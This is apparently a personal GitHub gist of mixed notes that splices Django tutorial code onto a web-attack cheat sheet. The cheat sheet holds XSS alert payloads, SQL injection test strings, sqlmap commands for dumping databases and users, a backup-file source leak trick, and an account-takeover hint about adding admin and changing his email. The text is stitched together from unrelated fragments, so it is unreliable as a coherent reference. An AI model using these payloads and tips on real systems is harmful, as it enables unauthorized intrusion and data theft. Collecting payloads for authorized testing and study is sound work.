Xifeng2009 / gist:d3041b0e5134fb9c778ca26c54eaf5cf
Created October 26, 2023 08:01
Recursively Read Filenames in Dir
# Walk the (user-expanded) template directory and print the full path of
# every regular file beneath it; directory names themselves are not printed.
# os.walk does not descend into symlinked directories unless followlinks=True,
# so a link loop cannot make the walk recurse forever.
root_dir = os.path.expanduser(nuclei_templates_path)
for dirpath, _dirnames, file_names in os.walk(root_dir):
    for file_name in file_names:
        print(os.path.join(dirpath, file_name))
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
# In app/views.py
import random
from django.http import JsonResponse
def ajax_1(request):
    """Answer an AJAX request with a JSON body of the form ``{"data": <int>}``.

    The integer is drawn from 1..999 (inclusive) on every call. ``request`` is
    accepted to satisfy the Django view signature but is not read.
    """
    # random.randint is fine for throwaway demo data; it is not a CSPRNG, so
    # this pattern must not be reused for tokens or anything security-sensitive.
    payload = {"data": random.randint(1, 999)}
    return JsonResponse(payload)
# In templates
<input id="a1" value="AAA">
<button id="b1" class="button">Click!</button>
# In app/forms.py
from django import forms
from .models import Topic
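class TopicForm(forms.ModelForm):
    """ModelForm for Topic that exposes only the user-editable title and text.

    The listing as pasted stopped inside ``labels`` without closing the dict
    or the class; both are terminated here.
    """

    class Meta:
        model = Topic
        # Name the editable fields explicitly rather than using "__all__", so
        # a field added to the model later is not silently accepted from input.
        fields = ['title', 'text']
        labels = {
            'title': 'Title: ',
            'text': 'Text: ',
        }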
# In models.py
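class Comment(models.Model):
    """A short free-text comment attached to a Topic, timestamped on creation."""

    # on_delete is required from Django 2.0 onward; CASCADE matches the old
    # implicit default, so deleting a Topic still deletes its comments.
    topic = models.ForeignKey(Topic, on_delete=models.CASCADE)
    # Nullable and blankable: a Comment row may exist with no text at all.
    comment = models.CharField(max_length=200, null=True, blank=True, verbose_name='评论')
    # Set once when the row is first saved; not touched on later saves.
    date_added = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')

    class Meta:
        verbose_name_plural = 'comments'

    def __str__(self):
        """Return the first 10 characters of the comment ('' when it is NULL)."""
        # comment is nullable, so guard against None before slicing.
        return (self.comment or '')[:10]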
# In settings.py
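# Django database configuration. The pasted listing closed only the inner
# 'default' dict; the outer DATABASES dict is terminated here.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        # Points the app at the server's built-in "mysql" system schema; an
        # application normally gets a database of its own.
        'NAME': 'mysql',
        # Connecting as root gives the app every privilege on the server; a
        # dedicated account limited to the application's schema is the
        # least-privilege choice.
        'USER': 'root',
        # Placeholder only. A real password must not be committed to source
        # control; read it from the environment or a secrets store instead.
        'PASSWORD': 'YOUR PASSWORD',
        'HOST': '127.0.0.1',
        'PORT': '3306',
    }
}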
# In project/urls.py
from django.conf.urls import url, include
# Hand every request path to the "main" app's URLconf: the empty regex
# matches any URL, so main.urls alone decides what gets routed.
urlpatterns = [url(r'', include('main.urls', namespace='main'))]
# In app/urls.py
from django.conf.urls import url
from . import views
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
#1 根据url进行注入 -u
sqlmap -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users
# 输出详细等级
-v [1-7]
-v/-vv/-vvv/-vvvv
#2 直连数据库 -d
sqlmap -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users
#1 判断盲注
1 and 1=2
1 and 1=1
#2 整型注入
1 or 1=1 #
#3 字符型注入
1' or 1=1 #